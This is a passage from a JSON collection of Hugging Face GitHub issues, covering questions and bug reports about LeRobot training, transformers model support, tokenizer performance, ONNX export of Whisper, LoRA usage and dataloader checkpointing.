\n\nAlternatives : https://github.com/lucasjinreal/Crane or https://docs.rs/kalosm/latest/kalosm/\n\nThanks in advance, \nHave a nice day. ", "url": "https://github.com/huggingface/candle/issues/3120", "state": "open", "labels": [], "created_at": "2025-10-07T21:27:31Z", "updated_at": "2025-10-09T13:02:35Z", "comments": 2, "user": "ierezell" }, { "repo": "huggingface/lerobot", "number": 2134, "title": "what is the transformers version for latest lerobot pi0?", "body": "### System Info\n\n```Shell\n- lerobot version: 0.3.4\n- Platform: Linux-5.4.0-148-generic-x86_64-with-glibc2.31\n- Python version: 3.10.18\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 1.26.4\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA A800-SXM4-80GB\n- Using GPU in script?:\n\nlerobot-eval --policy.path=\"lerobot/pi0_libero_finetuned\" --env.type=libero --env.task=libero_goal --eval.batch_size=1 --eval.n_episodes=2 --seed=1000\n```\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nClone latest LeRobot repository and install dependencies and run lerobot_eval.py\n```\nlerobot-eval --policy.path=\"lerobot/pi0_libero_finetuned\" --env.type=libero --env.task=libero_goal --eval.batch_size=1 --eval.n_episodes=2 --seed=1000\n```\n```\nTraceback (most recent call last):\n File \"/cephfs/yuanpuzhen/conda_data/envs/libero/bin/lerobot-eval\", line 7, in \n sys.exit(main())\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/scripts/lerobot_eval.py\", line 750, in main\n eval_main()\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/configs/parser.py\", line 225, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/scripts/lerobot_eval.py\", line 495, in eval_main\n policy = make_policy(\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/policies/factory.py\", line 386, in make_policy\n policy = policy_cls.from_pretrained(**kwargs)\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 923, in from_pretrained\n model = cls(config, **kwargs)\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 872, in __init__\n self.model = PI0Pytorch(config)\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 545, in __init__\n raise ValueError(msg) from None\nValueError: An incorrect transformer version is used, please create an issue on https://github.com/huggingface/lerobot/issues\nException ignored in: \nTraceback (most recent call last):\n File \"/cephfs/yuanpuzhen/conda_data/envs/libero/lib/python3.10/site-packages/robosuite/utils/binding_utils.py\", line 199, in __del__\n self.gl_ctx.free()\n File \"/cephfs/yuanpuzhen/conda_data/envs/libero/lib/python3.10/site-packages/robosuite/renderers/context/egl_context.py\", line 150, in free\n EGL.eglDestroyContext(EGL_DISPLAY, self._context)\n File \"/cephfs/yuanpuzhen/conda_data/envs/libero/lib/python3.10/site-packages/OpenGL/error.py\", line 230, in glCheckError\n raise self._errorClass(\nOpenGL.raw.EGL._errors.EGLError: EGLError(\n err = EGL_NOT_INITIALIZED,\n baseOperation = eglDestroyContext,\n cArguments = (\n ,\n ,\n ),\n result = 0\n)\n```\n### Expected behavior\n\nExpect to evaluate the given checkpoint, output eval videos and 
eval_info.json\n\nCan you provide stable transformers and numpy versions for the latest lerobot?\n\nAnd what version of transformers could satisfy the code in PI0Pytorch?\n```\n try:\n from transformers.models.siglip import check\n\n if not check.check_whether_transformers_replace_is_installed_correctly():\n raise ValueError(msg)\n except ImportError:\n raise ValueError(msg) from None\n```", "url": "https://github.com/huggingface/lerobot/issues/2134", "state": "closed", "labels": [], "created_at": "2025-10-07T12:06:52Z", "updated_at": "2025-11-14T20:04:50Z", "user": "PuzhenYuan" }, { "repo": "huggingface/diffusers", "number": 12441, "title": "Support Wan2.2-Animate", "body": "[Wan2.2-Animate-14B](https://humanaigc.github.io/wan-animate) is a unified model for character animation and replacement, with holistic movement and expression replication.\n\nhttps://github.com/user-attachments/assets/351227d0-4edc-4f6c-9bf9-053e53f218e4\n\nWe would like to open this to the community: if anyone is interested in integrating this model with Diffusers, just take these points into consideration:\n\n1. Don't integrate the preprocessing; we can help with that using a modular custom block.\n2. This issue is for more advanced users who know the diffusers library very well.\n\nJust let me know that you're interested, and if you have any doubts, feel free to ask. If you open a PR we can help, but we are currently busy with other priorities, so we ask you to be patient.", "url": "https://github.com/huggingface/diffusers/issues/12441", "state": "closed", "labels": [ "help wanted", "contributions-welcome" ], "created_at": "2025-10-06T18:08:21Z", "updated_at": "2025-11-13T02:52:32Z", "comments": 0, "user": "asomoza" }, { "repo": "huggingface/lerobot", "number": 2124, "title": "Question regarding downsampling and resizing dataset", "body": "Hi,\n\nThank you for providing this wonderful library! I was curious about how one can take an existing dataset (collected or downloaded) and modify the fps (downsample), resize images, or delete specific episodes (for v3) prior to policy training. I am finding this tricky to do, particularly when the dataset is not loaded in code but provided as a parameter to lerobot-train. I've spent time digging around the codebase but didn't see a way that doesn't involve loading the dataset in a script first and adjusting it there (for resizing; I'm not sure about downsampling the fps). Does the codebase provide utility functions for this? Thanks!", "url": "https://github.com/huggingface/lerobot/issues/2124", "state": "open", "labels": [ "question", "dataset", "good first issue" ], "created_at": "2025-10-06T16:07:47Z", "updated_at": "2025-10-07T20:25:20Z", "user": "karthikm-0" }, { "repo": "huggingface/transformers", "number": 41363, "title": "RT-Detr docs should reflect fixed 640x640 input size", "body": "The authors of RT-Detr mention that the model was trained on 640x640 images and was meant to be used for inference on 640x640 images. Also, the current implementation has certain quirks that make training/inferring on images of different sizes problematic. For example, the pixel masks used for batching images of varying sizes are discarded.\n\nhttps://github.com/huggingface/transformers/blob/0452f28544f3626273d25f07f83c0e5f7da2d47a/src/transformers/models/rt_detr/modeling_rt_detr.py#L1645\n\nThe above are not clear in the current docs. 
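\n\nFor illustration, a minimal inference sketch that sticks to the fixed 640x640 input (the checkpoint id and image path below are placeholders of mine, not something from the docs):\n\n```python\nimport torch\nfrom PIL import Image\nfrom transformers import RTDetrForObjectDetection, RTDetrImageProcessor\n\ncheckpoint = \"PekingU/rtdetr_r50vd\"  # assumed checkpoint id\nprocessor = RTDetrImageProcessor.from_pretrained(checkpoint)\nmodel = RTDetrForObjectDetection.from_pretrained(checkpoint)\n\nimage = Image.open(\"example.jpg\")  # placeholder image\n# The processor resizes to 640x640 by default; other sizes run into the quirks above.\ninputs = processor(images=image, size={\"height\": 640, \"width\": 640}, return_tensors=\"pt\")\nwith torch.no_grad():\n    outputs = model(**inputs)\n```\n\n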
I'll open a PR which adds a few lines in the docs to notify users about these issues.", "url": "https://github.com/huggingface/transformers/issues/41363", "state": "closed", "labels": [ "Documentation" ], "created_at": "2025-10-06T11:04:37Z", "updated_at": "2025-11-06T13:24:01Z", "comments": 4, "user": "konstantinos-p" }, { "repo": "huggingface/tokenizers", "number": 1873, "title": "Why is my Python implementation faster than the Rust implementation?", "body": "I am comparing the tokenizers in the Python (transformers) and the Rust implementations as follows\n\n```python\nimport json\nimport time\nfrom transformers import AutoTokenizer\ntokenizer = AutoTokenizer.from_pretrained(\"bert-base-cased\")\n\nN = 500\n\n[... Define and save the texts as data.json]\nwith open('./data.json', 'w', encoding='utf-8') as f:\n json.dump(texts[:N], f, ensure_ascii=False)\n\nstart = time.time()\nfor text in texts[:N]:\n tokenizer(text)\nend = time.time()\nloop_time = end-start\nprint(\"Python in a loop: \", loop_time, f\"for {N} examples.\")\n# Python in a loop: 4.231077432632446 for 500 examples.\n\nstart = time.time()\nresults = tokenizer(texts[:N])\nend = time.time()\nbatch_time = end-start\nprint(\"Python as a batch: \", batch_time, f\"for {N} examples.\")\n# Python as a batch: 0.86988 for 500 examples.\n\n```\nand the Rust implementation\n\n```rust\nuse tokenizers::tokenizer::{Result as TokenizerResult, Tokenizer, Encoding};\nuse serde_json::Result as SerdeResult;\nuse std::time::Instant;\nuse std::fs::File;\nuse std::io::{BufReader, BufWriter, Write};\nuse std::any::type_name;\nuse rayon::prelude::*;\n\nfn main() -> TokenizerResult<()> {\n // needs http feature enabled\n let tokenizer = Tokenizer::from_pretrained(\"bert-base-cased\", None)?;\n \n let file = File::open(\"./data.json\")?;\n let reader = BufReader::new(file);\n let items: Vec<String> = serde_json::from_reader(reader)?;\n let texts: Vec<&str> = items.iter().map(|s| s.as_str()).collect();\n\n let start = Instant::now();\n for name in texts.iter(){\n let encoding = tokenizer.encode(*name, false)?;\n }\n let duration = start.elapsed();\n println!(\"(1) Execution in loop: {:.6} seconds\", duration.as_secs_f64());\n // (1) Execution in loop: 29.867990 seconds\n\n let start = Instant::now();\n let encoded_items: Vec<_> = texts.par_iter().map(|name| tokenizer.encode(*name, false)).collect();\n let duration = start.elapsed();\n println!(\"(2) Execution with par_iter : time: {:.6} seconds\", duration.as_secs_f64());\n // (2) Execution with par_iter : 3.968467\n \n let start = Instant::now();\n let encoded_items: TokenizerResult<Vec<Encoding>> = tokenizer.encode_batch(items.clone(), false);\n let duration = start.elapsed();\n println!(\"(3) Execution with encode_batch : time: {:.6} seconds\", duration.as_secs_f64());\n // (3) Execution with encode_batch : 3.968467 seconds\n \n\n let start = Instant::now();\n let encoded_items: TokenizerResult<Vec<Encoding>> = tokenizer.encode_batch_char_offsets(items.clone(), false);\n let duration = start.elapsed();\n println!(\"(4) Execution with encode_batch_char_offsets : time: {:.6} seconds\", duration.as_secs_f64());\n // (4) Execution with encode_batch_char_offsets : 6.839765 seconds\n\n let start = Instant::now();\n let encoded_items: TokenizerResult<Vec<Encoding>> = tokenizer.encode_batch_fast(items.clone(), false);\n let duration = start.elapsed();\n println!(\"(5) Execution with encode_batch_fast : time: {:.6} seconds\", duration.as_secs_f64());\n // (5) Execution with encode_batch_fast : 5.758732 seconds\n\n\n Ok(())\n}\n```\n\nYou see that Rust is 10 times slower 
in a loop and 3 times slower even when parallelization is used.\nWhat is the trick here? How can I make my Rust code as fast as (or hopefully faster than) the Python code?", "url": "https://github.com/huggingface/tokenizers/issues/1873", "state": "closed", "labels": [], "created_at": "2025-10-05T08:02:47Z", "updated_at": "2025-10-08T17:41:28Z", "comments": 4, "user": "sambaPython24" }, { "repo": "huggingface/transformers", "number": 41336, "title": "Is there a bug in group_videos_by_shape for qwenvl video preprocessing?", "body": "### System Info\n\nIn src/transformers/video_utils.py, group_videos_by_shape does\n`grouped_videos = {shape: torch.stack(videos, dim=0) for shape, videos in grouped_videos.items()}`, where each video is of shape BTCHW. This creates a new dimension.\nHowever, the qwenvl video preprocessing does\n`batch_size, grid_t, channel = patches.shape[:3]`\nwhich does not account for the additional dimension created in group_videos_by_shape.\nI think we should use torch.cat, not torch.stack?\n@yonigozlan @molbap \n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nrunning video preprocessing with a list of video inputs, each with a different shape\n\n### Expected behavior\n\nrun without error", "url": "https://github.com/huggingface/transformers/issues/41336", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-03T22:26:26Z", "updated_at": "2025-10-03T22:44:43Z", "comments": 1, "user": "dichencd" }, { "repo": "huggingface/lerobot", "number": 2111, "title": "frame deletion", "body": "Great work on this project! I have a quick question - does LeRobotDataset support frame deletion? For example, in the DROID_lerobot dataset, the first few frames have an action value of 0 and I need to remove them.\nI'd appreciate any insights you can provide. Thank you for your time and help!", "url": "https://github.com/huggingface/lerobot/issues/2111", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-10-03T13:05:12Z", "updated_at": "2025-10-10T12:17:53Z", "user": "Yysrc" }, { "repo": "huggingface/lerobot", "number": 2108, "title": "HIL-SERL Transform order for (tanh \u2192 rescale) is reversed", "body": "In `TanhMultivariateNormalDiag`:\n\n```\ntransforms = [TanhTransform(cache_size=1)]\nif low is not None and high is not None:\n transforms.insert(0, RescaleFromTanh(low, high)) # puts Rescale *before* tanh\n\n```\n\nThis applies RescaleFromTanh then Tanh, which is backwards. Should we change it to tanh first, then rescale?\n\nFix:\n\n```\ntransforms = [TanhTransform(cache_size=1)]\nif low is not None and high is not None:\n transforms.append(RescaleFromTanh(low, high)) # tanh \u2192 rescale\n```\n\nAlso, when I tried to assign values for low and high, 
I got error:\n\n```\ntorch/distributions/transforms.py\", line 303, in domain\n domain = self.parts[0].domain\nAttributeError: 'RescaleFromTanh' object has no attribute 'domain'\n```\n\nMight be fixed by adding the following to `class RescaleFromTanh(Transform)`\n\n```\n# Required attributes for PyTorch Transform\nself.domain = constraints.interval(-1.0, 1.0)\nself.codomain = constraints.interval(low, high)\nself.bijective = True\n```", "url": "https://github.com/huggingface/lerobot/issues/2108", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-02T21:44:22Z", "updated_at": "2025-10-07T20:36:31Z", "user": "priest-yang" }, { "repo": "huggingface/lerobot", "number": 2107, "title": "Low Success Rate When Training SmolVLA-0.24B on LIBERO", "body": "Hi folks, I'm trying to replicate the 0.24B SmolVLA model on the LIBERO dataset. Intuitively, I just changed the base model `vlm_model_name: str = \"HuggingFaceTB/SmolVLM2-256M-Video-Instruct\"`. Here is the command I used to train. \n\n`lerobot-train --policy.type=smolvla --policy.load_vlm_weights=true --dataset.repo_id=HuggingFaceVLA/libero --env.type=libero --env.task=libero_10 --output_dir=./outputs/ --steps=100000 --batch_size=64 --eval.batch_size=1 --eval.n_episodes=1 --eval_freq=1000 --wandb.enable=true`\n\nI trained on a single RTX4090. However, I found that the success rate on the eval set is quite low. The success rate was only 7.5%. Is there anything I did wrong? Attaching the training plots below. \n\n\"Image\"\n\n\"Image\"", "url": "https://github.com/huggingface/lerobot/issues/2107", "state": "open", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-10-02T19:11:55Z", "updated_at": "2025-12-20T09:30:58Z", "user": "zimgong" }, { "repo": "huggingface/optimum-onnx", "number": 66, "title": "How to export a stateless whisper model via optimum-cli?", "body": "I observe that when exporting a Whisper model via Python API, the resulting model is stateless, i.e. 
the decoder is split into two models.\n```python\nimport os\nfrom optimum.onnxruntime import ORTModelForSpeechSeq2Seq\nORTModelForSpeechSeq2Seq.from_pretrained(\"openai/whisper-tiny\", export=True).save_pretrained(\"./whisper/python\")\nprint(os.listdir(\"./whisper/python\"))\n# ['encoder_model.onnx', 'decoder_with_past_model.onnx', 'decoder_model.onnx', 'config.json', 'generation_config.json']\n```\n\nWhen I export this model via CLI, the decoder model is exported as stateful even if I provide the `--no-post-process` argument.\n```bash\noptimum-cli export onnx --task automatic-speech-recognition -m openai/whisper-tiny --no-post-process ./whisper/cli\nls ./whisper/cli\n\n# added_tokens.json decoder_model.onnx generation_config.json normalizer.json special_tokens_map.json tokenizer.json\n# config.json encoder_model.onnx merges.txt preprocessor_config.json tokenizer_config.json vocab.json\n```\n\nMy environment:\n```\ncertifi==2025.8.3\ncharset-normalizer==3.4.3\ncoloredlogs==15.0.1\nfilelock==3.19.1\nflatbuffers==25.9.23\nfsspec==2025.9.0\nhf-xet==1.1.10\nhuggingface-hub==0.35.3\nhumanfriendly==10.0\nidna==3.10\nJinja2==3.1.6\nMarkupSafe==3.0.3\nml_dtypes==0.5.3\nmpmath==1.3.0\nnetworkx==3.4.2\nnumpy==2.2.6\nnvidia-cublas-cu12==12.8.4.1\nnvidia-cuda-cupti-cu12==12.8.90\nnvidia-cuda-nvrtc-cu12==12.8.93\nnvidia-cuda-runtime-cu12==12.8.90\nnvidia-cudnn-cu12==9.10.2.21\nnvidia-cufft-cu12==11.3.3.83\nnvidia-cufile-cu12==1.13.1.3\nnvidia-curand-cu12==10.3.9.90\nnvidia-cusolver-cu12==11.7.3.90\nnvidia-cusparse-cu12==12.5.8.93\nnvidia-cusparselt-cu12==0.7.1\nnvidia-nccl-cu12==2.27.3\nnvidia-nvjitlink-cu12==12.8.93\nnvidia-nvtx-cu12==12.8.90\nonnx==1.19.0\nonnxruntime==1.23.0\noptimum @ git+https://github.com/huggingface/optimum@a813c95ac088c401547fe15e7a68ac5c6f00f9a7\noptimum-onnx @ git+https://github.com/huggingface/optimum-onnx.git@671b84f78a244594dd21cb1a8a1f7abb8961ea60\npackaging==25.0\nprotobuf==6.32.1\nPyYAML==6.0.3\nregex==2025.9.18\nrequests==2.32.5\nsafetensors==0.6.2\nsympy==1.14.0\ntokenizers==0.21.4\ntorch==2.8.0\ntqdm==4.67.1\ntransformers==4.55.4\ntriton==3.4.0\ntyping_extensions==4.15.0\nurllib3==2.5.0\n\n```\n\nHow to export this model as stateless via optimum-cli? 
Also, how can I export this model as stateful via the Python API?\n\nThanks!", "url": "https://github.com/huggingface/optimum-onnx/issues/66", "state": "closed", "labels": [ "question" ], "created_at": "2025-10-02T09:50:03Z", "updated_at": "2025-10-13T05:33:25Z", "user": "nikita-savelyevv" }, { "repo": "huggingface/lerobot", "number": 2104, "title": "Select the VLM backbone for SmolVLA", "body": "Hi, may I ask about the vlm_model_name: is there any model more powerful than HuggingFaceTB/SmolVLM2-500M-Video-Instruct that can be used to train SmolVLA for the LeRobot SO101?", "url": "https://github.com/huggingface/lerobot/issues/2104", "state": "open", "labels": [ "question", "policies", "good first issue" ], "created_at": "2025-10-02T07:35:29Z", "updated_at": "2025-10-11T16:53:59Z", "user": "Llkhhb" }, { "repo": "huggingface/diffusers", "number": 12415, "title": "SVG 2 kernels", "body": "Can we support the new sparse kernels from SVG2 (NeurIPS 2025)?\nhttps://svg-project.github.io/v2/", "url": "https://github.com/huggingface/diffusers/issues/12415", "state": "open", "labels": [], "created_at": "2025-10-01T10:52:50Z", "updated_at": "2025-10-01T10:52:50Z", "comments": 0, "user": "bhack" }, { "repo": "huggingface/lerobot", "number": 2096, "title": "How can I change the task name of already recorded episodes?", "body": "I recorded the dataset using:\n\n--dataset.single_task=\"slice the clay until it becomes 4 pieces\"\n\n\nNow I want to update those recorded episodes to a different task name. How can I do that?", "url": "https://github.com/huggingface/lerobot/issues/2096", "state": "open", "labels": [ "question", "dataset", "good first issue" ], "created_at": "2025-10-01T02:15:49Z", "updated_at": "2025-10-30T03:48:47Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/transformers", "number": 41235, "title": "How can I use StatefulDataLoader to recover the training data state (not only the model state) from a checkpoint?", "body": "I'd like to request demo code for StatefulDataLoader. I want to use a data checkpoint to recover a training run's data state, not only the model state. How can I use StatefulDataLoader (or some other code) to achieve this?\n\nTo restate: I want to recover the data state, not only the model state. How can I use accelerate + the transformers Trainer so that, when training is interrupted, it can resume from both a data checkpoint and a model checkpoint? Thanks.", "url": "https://github.com/huggingface/transformers/issues/41235", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-30T17:07:07Z", "updated_at": "2025-11-08T08:04:40Z", "user": "ldh127" }, { "repo": "huggingface/accelerate", "number": 3802, "title": "How can I use StatefulDataLoader to recover the training data state (not only the model state) from a checkpoint?", "body": "I'd like to request demo code for StatefulDataLoader. I want to use a data checkpoint to recover a training run's data state, not only the model state. How can I use StatefulDataLoader (or some other code) to achieve this?\n\nTo restate: I want to recover the data state, not only the model state. How can I use accelerate + the transformers Trainer so that, when training is interrupted, it can resume from both a data checkpoint and a model checkpoint? 
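\n\nFor reference, this is roughly the kind of demo I am asking for, using torchdata's StatefulDataLoader (the dataset and the save point below are placeholders; wiring this into accelerate/Trainer is exactly the part I need help with):\n\n```python\nfrom torchdata.stateful_dataloader import StatefulDataLoader\n\ndataset = list(range(100))  # placeholder dataset\nloader = StatefulDataLoader(dataset, batch_size=8, num_workers=2)\n\ndata_state = None\nfor step, batch in enumerate(loader):\n    if step == 3:\n        data_state = loader.state_dict()  # save this next to the model checkpoint\n        break\n\n# after an interruption: rebuild the loader and restore the data position\nloader = StatefulDataLoader(dataset, batch_size=8, num_workers=2)\nloader.load_state_dict(data_state)\nfor batch in loader:\n    pass  # iteration resumes after the saved batch instead of restarting the epoch\n```\n\n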
Thanks, and I hope my request is clear.\n", "url": "https://github.com/huggingface/accelerate/issues/3802", "state": "closed", "labels": [], "created_at": "2025-09-30T15:58:32Z", "updated_at": "2025-11-09T15:06:58Z", "user": "ldh127" }, { "repo": "huggingface/transformers", "number": 41211, "title": "Add DEIMv2", "body": "### Model description\n\nIt would be nice to integrate DEIMv2, a new state-of-the-art model for real-time object detection based on DINOv3. The weights are released under Apache 2.0.\n\nRelated thread: https://github.com/Intellindust-AI-Lab/DEIMv2/issues/20\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\nCode: https://github.com/Intellindust-AI-Lab/DEIMv2\nWeights (on Google Drive for now): https://github.com/Intellindust-AI-Lab/DEIMv2?tab=readme-ov-file#1-model-zoo\n\nIdeally, the [AutoBackbone API](https://huggingface.co/docs/transformers/main_classes/backbones) can be leveraged to avoid having to re-implement the entire DINOv3 backbone in `modular_deimv2.py` and `modeling_deimv2.py`. See an example of how this is leveraged for DETR [here](https://github.com/huggingface/transformers/blob/59035fd0e1876f9e526488b61fe43ff8829059f6/src/transformers/models/detr/modeling_detr.py#L280).", "url": "https://github.com/huggingface/transformers/issues/41211", "state": "open", "labels": [ "New model" ], "created_at": "2025-09-30T09:43:07Z", "updated_at": "2025-10-04T18:44:06Z", "comments": 4, "user": "NielsRogge" }, { "repo": "huggingface/transformers", "number": 41208, "title": "Integrate mamba SSM kernels from the hub", "body": "### Feature request\n\nCurrently, mamba kernels are imported via the main source package, e.g. for [GraniteMoeHybrid](https://github.com/huggingface/transformers/blob/main/src/transformers/models/granitemoehybrid/modeling_granitemoehybrid.py#L44-L46)\n\nCan we migrate this to use the kernels-hub (`kernels-community/mamba-ssm`) variation instead?\n\n### Motivation\n\nRemoves the external dependency. The kernel hub is also integrated at several other places throughout the library.\n\n### Your contribution\n\nI can submit a PR for migrating from the PyPI `mamba_ssm` package to the `kernels` package for mamba ops.", "url": "https://github.com/huggingface/transformers/issues/41208", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-09-30T07:50:52Z", "updated_at": "2025-12-18T10:17:06Z", "comments": 15, "user": "romitjain" }, { "repo": "huggingface/tokenizers", "number": 1870, "title": "How can I convert a trained tokenizer into `transformers` format", "body": "Hi guys,\n\nI have trained a tokenizer which works pretty well, and it is stored in a single `.json` file. Is there any method / API to convert it into a `transformers` tokenizer format?\n\nIf there's no such implementation, I am happy to contribute.", "url": "https://github.com/huggingface/tokenizers/issues/1870", "state": "closed", "labels": [], "created_at": "2025-09-30T06:09:52Z", "updated_at": "2025-09-30T13:53:53Z", "comments": 1, "user": "dibbla" }, { "repo": "huggingface/lighteval", "number": 999, "title": "How to print all pass@k scores when generating 16 samples?", "body": "Hi,\n\nI want to print the results of all pass@k metrics when generating 16 samples 
(e.g., k=1, 2, 4, 8, 16).\n\n```python\n\nmath_500_pass_k_at_16 = LightevalTaskConfig(\n name=\"math_500_pass_k_at_16\",\n suite=[\"custom\"],\n prompt_function=math_500_prompt_fn,\n hf_repo=\"HuggingFaceH4/MATH-500\",\n hf_subset=\"default\",\n hf_avail_splits=[\"test\"],\n evaluation_splits=[\"test\"],\n few_shots_split=None,\n few_shots_select=None,\n generation_size=32768,\n metrics=[\n Metrics.pass_at_k_math(sample_params={\"k\": 1, \"n\": 16}),\n Metrics.pass_at_k_math(sample_params={\"k\": 2, \"n\": 16}),\n Metrics.pass_at_k_math(sample_params={\"k\": 4, \"n\": 16}),\n Metrics.pass_at_k_math(sample_params={\"k\": 8, \"n\": 16}),\n Metrics.pass_at_k_math(sample_params={\"k\": 16, \"n\": 16}),\n ],\n version=2,\n)\n```\n\nBut I can't see the full set of results that I want. Does anyone know how to resolve this?\n", "url": "https://github.com/huggingface/lighteval/issues/999", "state": "open", "labels": [], "created_at": "2025-09-29T21:49:44Z", "updated_at": "2025-10-14T08:04:17Z", "user": "passing2961" }, { "repo": "huggingface/lerobot", "number": 2083, "title": "How to train this RL model with my trained data", "body": "I want this model to load the trained model that I have already generated. So, I modified the output_dir and set resume to true, but then the problem shown in the figure occurred. How can I solve it?\n`{ \"output_dir\": \"outputs/train/2025-09-28/17-28-55_default\", \n\"job_name\": \"default\", \"resume\": true, \n\"seed\": 1000, \"num_workers\": 4, \n\"batch_size\": 256, \n\"steps\": 100000,`\n\nand the original config is:\n`{ \"output_dir\": null, \n\"job_name\": \"default\", \"resume\": false, \n\"seed\": 1000, \"num_workers\": 4, \n\"batch_size\": 256, \n\"steps\": 100000,`\n\n\"Image\"", "url": "https://github.com/huggingface/lerobot/issues/2083", "state": "open", "labels": [], "created_at": "2025-09-29T07:22:08Z", "updated_at": "2025-10-07T20:32:04Z", "user": "993984583" }, { "repo": "huggingface/lerobot", "number": 2082, "title": "How to train this RL model with my model data", "body": "I want this model to load the trained model that I have already generated. So, I modified the output_dir and set resume to true, but then the problem shown in the figure occurred. How can I solve it?\n`{\n \"output_dir\": \"outputs/train/2025-09-28/17-28-55_default\",\n \"job_name\": \"default\",\n \"resume\": true,\n \"seed\": 1000,\n \"num_workers\": 4,\n \"batch_size\": 256,\n \"steps\": 100000,`\n\n\"Image\"", "url": "https://github.com/huggingface/lerobot/issues/2082", "state": "closed", "labels": [], "created_at": "2025-09-29T07:18:52Z", "updated_at": "2025-10-07T20:33:11Z", "user": "993984583" }, { "repo": "huggingface/sentence-transformers", "number": 3532, "title": "What is the proper way to use prompts? Do we have to format/render them ourselves?", "body": "Hi. This is my first time using the Sentence Transformers library, and I had a question about using prompts. 
Specifically, it seems like the [`SentenceTransformer.encode_document`](https://sbert.net/docs/package_reference/sentence_transformer/SentenceTransformer.html#sentence_transformers.SentenceTransformer.encode_document) method is a convenient wrapper for the [`SentenceTransformer.encode`](https://sbert.net/docs/package_reference/sentence_transformer/SentenceTransformer.html#sentence_transformers.SentenceTransformer.encode) method in the sense that the prompt `\"document\"` and the task `\"document\"` are selected automatically.\n\nHowever, I'm noticing that the prompt is simply prepended to the provided text rather than having it be formatted. The prompt for `\"document\"` is `title: {title | \"none\"} | text: {content}` and inside the `encode` method simply prepends it: https://github.com/UKPLab/sentence-transformers/blob/7341bf155b4349b88690b78c84beb5aa658c439f/sentence_transformers/SentenceTransformer.py#L1040\n\nMeaning that the resulting input to the embedding model would look like `title: none | text: {OUR_TEXT}`. But what if we wanted to include a `title` value? It seems like we'd have to pre-process the input ourselves. But then what is the point of using `encode_document`?", "url": "https://github.com/huggingface/sentence-transformers/issues/3532", "state": "closed", "labels": [], "created_at": "2025-09-28T06:32:51Z", "updated_at": "2025-09-30T10:59:24Z", "user": "seanswyi" }, { "repo": "huggingface/transformers", "number": 41186, "title": "Qwen2.5-VL restore tensor multi-image form", "body": "\nHello, I have recently been experimenting with qwen2.5-vl (https://github.com/huggingface/transformers/blob/v4.52-release/src/transformers/models/qwen2_5_vl/modeling_qwen2_5_vl.py). I noticed that multiple images are pre-merged here,\n```\nimage_embeds = self.get_image_features(pixel_values, image_grid_thw)\n```\n but I want to process each image individually, such as performing pooling on each image. I found that when I attempt operations like \n```\nimage_embeds.view(n_img, image_embeds.shape[0]//n_img, -1)\n```\n I cannot correctly restore the multi-image format. Could you please advise on how to handle this? \n", "url": "https://github.com/huggingface/transformers/issues/41186", "state": "closed", "labels": [], "created_at": "2025-09-28T03:36:24Z", "updated_at": "2025-11-05T08:02:55Z", "comments": 2, "user": "NiFangBaAGe" }, { "repo": "huggingface/peft", "number": 2802, "title": "Guide on training that requires both LoRA and base model forward calls ?", "body": "Hi, I'm working on some training variants that require hidden states from the base model and the hidden states produced with LoRA. I'm currently initializing two separate model objects:\n```\n from peft import get_peft_model\n m1=AutoModelForCausalLM.from_pretrained(model_path)\n m2=AutoModelForCausalLM.from_pretrained(model_path)\n lora_config = LoraConfig(....)\n m2 = get_peft_model(m2, lora_config)\n```\n\nIs there already an api to call non-lora forward with `m2` object ? I believe it'll be more memory efficient.", "url": "https://github.com/huggingface/peft/issues/2802", "state": "closed", "labels": [], "created_at": "2025-09-27T23:12:23Z", "updated_at": "2025-10-15T10:26:15Z", "comments": 3, "user": "thangld201" }, { "repo": "huggingface/lerobot", "number": 2072, "title": "How to run lerobot with RTX 5090? 
If not possible, please add support", "body": "### System Info\n\n```Shell\n- lerobot version: 0.3.4\n- Platform: Linux-6.14.0-32-generic-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface Hub version: 0.35.1\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.8.0+cu128\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.8\n- GPU model: NVIDIA GeForce RTX 5090\n- Using GPU in script?: Yes\n```\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI am trying to run the train script as shown in the examples\n\n```\npython -m lerobot.scripts.lerobot_train --policy.path=cijerezg/smolvla-test --dataset.repo_id=cijerezg/pick-up-train-v1 --batch_size=48 --steps=20000 --output_dir=outputs/train/my_smolvla_pickup_v9 --job_name=my_smolvla_training --policy.device=cuda --wandb.enable=true --policy.repo_id=pickup_policy_v5 --save_freq=1000\n```\n\n### Expected behavior\n\nI expect it to run, but instead I get the following error: \n\n```\nTraceback (most recent call last):\n File \"\", line 198, in _run_module_as_main\n File \"\", line 88, in _run_code\n File \"/home/user/Documents/Research/RL/LeRobot/lerobot/src/lerobot/scripts/lerobot_train.py\", line 363, in \n main()\n File 